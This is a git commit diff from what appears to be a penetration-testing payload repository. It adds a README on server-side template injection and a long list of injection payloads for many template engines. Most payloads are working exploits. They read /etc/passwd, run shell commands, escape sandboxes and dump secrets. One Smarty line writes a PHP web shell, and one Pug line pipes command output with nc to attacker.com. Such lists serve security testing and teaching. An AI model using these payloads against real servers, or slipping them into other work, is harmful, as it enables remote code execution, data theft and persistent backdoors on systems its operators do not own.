Add comprehensive payloads and 4 new vulnerability types (SSTI, HTTP Request Smuggling, CORS, JWT)

Co-authored-by: Stalin-143 <161853795+Stalin-143@users.noreply.github.com>

SSTI/README.md

@@ -0,0 +1,37 @@
+# Server-Side Template Injection (SSTI)
+
+## Description
+Server-Side Template Injection occurs when user input is embedded in a template in an unsafe manner, allowing attackers to inject template directives and execute arbitrary code on the server. SSTI can lead to remote code execution, information disclosure, and complete server compromise.
+
+## Common Vulnerable Template Engines
+- **Jinja2** (Python - Flask, Django)
+- **Twig** (PHP)
+- **Freemarker** (Java)
+- **Velocity** (Java)
+- **Smarty** (PHP)
+- **Pug/Jade** (Node.js)
+- **ERB** (Ruby on Rails)
+- **Thymeleaf** (Java)
+
+## Common Attack Vectors
+- User input in template rendering
+- Email templates with user-controlled content
+- Error messages with dynamic content
+- Markdown/Wiki renderers
+- PDF generators
+- Report generators
+
+## Testing Approach
+1. Inject template syntax like `{{7*7}}` or `${7*7}` in input fields
+2. Observe if mathematical expressions are evaluated
+3. Identify the template engine through error messages or syntax
+4. Escalate to code execution using engine-specific payloads
+
+## Detection Methods
+- Submit polyglot payloads: `${{<%[%'"}}%\`
+- Test mathematical operations: `{{7*7}}`, `${7*7}`
+- Check for template-specific syntax errors
+- Analyze response differences
+
+## Payloads
+See `ssti-payloads.txt` for a comprehensive list of SSTI payloads.

SSTI/ssti-payloads.txt

@@ -0,0 +1,310 @@
+# Server-Side Template Injection (SSTI) Payloads
+
+# Detection/Polyglot payloads
+${{<%[%'"}}%\
+{{7*7}}
+${7*7}
+<%= 7*7 %>
+${{7*7}}
+#{7*7}
+*{7*7}
+
+# Jinja2 (Python - Flask)
+# Basic detection
+{{7*7}}
+{{7*'7'}}
+{{config}}
+{{self}}
+
+# Information disclosure
+{{config.items()}}
+{{self.__dict__}}
+{{request.environ}}
+{{request.application.__globals__}}
+
+# File read
+{{''.__class__.__mro__[1].__subclasses__()[40]('/etc/passwd').read()}}
+{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
+
+# Remote code execution
+{{self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read()}}
+{{self._TemplateReference__context.joiner.__init__.__globals__.os.popen('whoami').read()}}
+{{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}
+{{config.__class__.__init__.__globals__['os'].popen('cat /etc/passwd').read()}}
+{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
+{{request['application']['__globals__']['__builtins__']['__import__']('os').popen('ls').read()}}
+{{lipsum.__globals__['os'].popen('whoami').read()}}
+{{cycler.__init__.__globals__.os.popen('id').read()}}
+{{joiner.__init__.__globals__.os.popen('id').read()}}
+{{namespace.__init__.__globals__.os.popen('id').read()}}
+
+# Jinja2 sandbox escape
+{{''.__class__.__base__.__subclasses__()}}
+{{[].__class__.__base__.__subclasses__()}}
+{{''.__class__.__mro__[1].__subclasses__()}}
+
+# Twig (PHP)
+# Basic detection
+{{7*7}}
+{{7*'7'}}
+{{dump(app)}}
+{{app.request.server.all|join(',')}}
+
+# Information disclosure
+{{_self.env.getGlobals()}}
+{{_self.env}}
+{{dump(_context)}}
+
+# Remote code execution
+{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
+{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("whoami")}}
+{{['id']|filter('system')}}
+{{['cat /etc/passwd']|filter('system')}}
+{{['cat\x20/etc/passwd']|filter('system')}}
+{{['id']|map('passthru')|join}}
+{{['whoami']|map('system')|join}}
+{{'a'.toUpperCase()}}
+{{1*1}}{{6*6}}
+
+# Freemarker (Java)
+# Basic detection
+${7*7}
+#{7*7}
+<#assign ex="freemarker.template.utility.Execute"?new()> ${ex("id")}
+
+# Remote code execution
+<#assign ex="freemarker.template.utility.Execute"?new()>${ex("whoami")}
+<#assign ex="freemarker.template.utility.Execute"?new()>${ex("cat /etc/passwd")}
+<#assign ex="freemarker.template.utility.ObjectConstructor"?new()>${ex("java.lang.ProcessBuilder","id").start()}
+${"freemarker.template.utility.Execute"?new()("id")}
+
+# Information disclosure
+${.data_model}
+${.globals}
+${.main}
+${.namespace}
+${.current_namespace}
+${.vars}
+
+# Velocity (Java)
+# Basic detection
+#set($x=7*7)$x
+${{7*7}}
+
+# Remote code execution
+#set($str=$class.inspect("java.lang.String").type)
+#set($chr=$class.inspect("java.lang.Character").type)
+#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("whoami"))
+#set($null=$ex.waitFor())
+#foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end
+
+#set($x='')##
+#set($rt=$x.class.forName('java.lang.Runtime'))##
+#set($chr=$x.class.forName('java.lang.Character'))##
+#set($str=$x.class.forName('java.lang.String'))##
+#set($ex=$rt.getRuntime().exec('id'))##
+$ex.waitFor()
+#set($out=$ex.getInputStream())##
+#foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end
+
+# Smarty (PHP)
+# Basic detection
+{$smarty.version}
+{php}echo `id`;{/php}
+{7*7}
+
+# Remote code execution
+{system('ls')}
+{system('cat /etc/passwd')}
+{php}system('id');{/php}
+{php}phpinfo();{/php}
+{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
+
+# Information disclosure
+{$smarty.template}
+{$smarty.current_dir}
+{$smarty.template_dir}
+
+# Pug/Jade (Node.js)
+# Basic detection
+#{7*7}
+!{7*7}
+
+# Remote code execution
+#{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('whoami')}()}
+#{global.process.mainModule.require('child_process').exec('id')}
+#{global.process.mainModule.require('child_process').execSync('id').toString()}
+- var x = root.process
+- x = x.mainModule.require
+- x = x('child_process')
+= x.exec('id | nc attacker.com 8080')
+
+# ERB (Ruby on Rails)
+# Basic detection
+<%= 7*7 %>
+<%= system('whoami') %>
+
+# Remote code execution
+<%= system('id') %>
+<%= `id` %>
+<%= IO.popen('id').readlines() %>
+<%= require 'open3' %><%= Open3.capture2("id")[0] %>
+<%= File.open('/etc/passwd').read %>
+
+# Thymeleaf (Java)
+# Basic detection
+[[${7*7}]]
+[(${7*7})]
+[# th:block th:each="i : ${#numbers.sequence(1, 7*7)}" /]
+
+# Remote code execution (with SpringEL)
+${T(java.lang.Runtime).getRuntime().exec('calc')}
+*{T(java.lang.Runtime).getRuntime().exec('calc')}
+*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('id').getInputStream())}
+
+# Tornado (Python)
+# Basic detection
+{{7*7}}
+{% import os %}{{os.popen("id").read()}}
+
+# Remote code execution
+{% import subprocess %}{{subprocess.check_output('id',shell=True)}}
+{% import os %}{{os.system('whoami')}}
+
+# Mako (Python)
+# Basic detection
+${7*7}
+<%={{7*7}%>
+
+# Remote code execution
+<%import os%>${os.popen("id").read()}
+${__import__('os').popen('id').read()}
+
+# Django (Python)
+# Basic detection
+{{7*7}}
+{% debug %}
+
+# Limited RCE (usually sandboxed)
+{{request.META}}
+{{settings.SECRET_KEY}}
+
+# Handlebars (Node.js)
+# Basic detection
+{{7*7}}
+{{this}}
+
+# Prototype pollution
+{{#with "constructor"}}{{#with split as |a|}}{{pop (push "alert('XSS')")}}{{#with .}}{{#with (concat (lookup join (slice 0 1)))}}{{#each .}}{{#with (string.sub.call ../sub "constructor")}}{{this}}{{/with}}{{/each}}{{/with}}{{/with}}{{/with}}{{/with}}
+
+# Groovy (Java)
+# Basic detection
+${7*7}
+<%= 7*7 %>
+
+# Remote code execution
+${"".getClass().forName("java.lang.Runtime").getRuntime().exec("calc")}
+
+# Dot (JavaScript)
+# Basic detection
+{{=7*7}}
+
+# Remote code execution
+{{= global.process.mainModule.require('child_process').execSync('id').toString() }}
+
+# Nunjucks (JavaScript)
+# Basic detection
+{{7*7}}
+{{foo}}
+
+# Remote code execution
+{{range.constructor("return global.process.mainModule.require('child_process').execSync('id')")()}}
+
+# Razor (.NET)
+# Basic detection
+@(7*7)
+@{7*7}
+
+# Information disclosure
+@System.Diagnostics.Process.GetCurrentProcess().Id
+@Directory.GetFiles("C:\\")
+
+# EJS (JavaScript)
+# Basic detection
+<%=7*7%>
+
+# Remote code execution
+<%=global.process.mainModule.require('child_process').execSync('id')%>
+
+# Underscore/Lodash templates (JavaScript)
+# Basic detection
+<%=7*7%>
+
+# Remote code execution
+<%= _.template('test')() %>
+
+# Marko (JavaScript)
+# Basic detection
+${7*7}
+
+# Remote code execution
+${console.log(global.process.mainModule.require('child_process').execSync('id').toString())}
+
+# Plate (Rust)
+# Basic detection
+{{7*7}}
+
+# Liquid (Ruby)
+# Basic detection
+{{7 | times: 7}}
+
+# Scalate (Scala)
+# Basic detection
+${7*7}
+<%=7*7%>
+
+# Template.js
+# Basic detection
+{{7*7}}
+
+# Trim (Java)
+# Basic detection
+${7*7}
+
+# Jade/Pug continued (with more variants)
+- var x = global.process.mainModule.require
+!{x('child_process').execSync('cat /etc/passwd')}
+
+# ColdFusion
+# Basic detection
+#7*7#
+
+# ASP.NET Web Forms
+# Basic detection
+<%= 7*7 %>
+
+# Expression Language (Java EE)
+# Basic detection
+${7*7}
+#{7*7}
+
+# Remote code execution
+${pageContext.request.getSession().setAttribute("shell","".getClass().forName("java.lang.Runtime").getMethod("getRuntime").invoke(null).exec(request.getParameter("cmd")))}
+
+# Generic testing payloads
+{{self}}
+${self}
+<%= self %>
+#{self}
+*{self}
+@{self}
+{{constructor}}
+{{__class__}}
+{{__init__}}
+{{__globals__}}
+{{__import__}}
+
+# Blind SSTI detection
+a{{9999*9999}}b
+a${9999*9999}b
+a<%= 9999*9999 %>b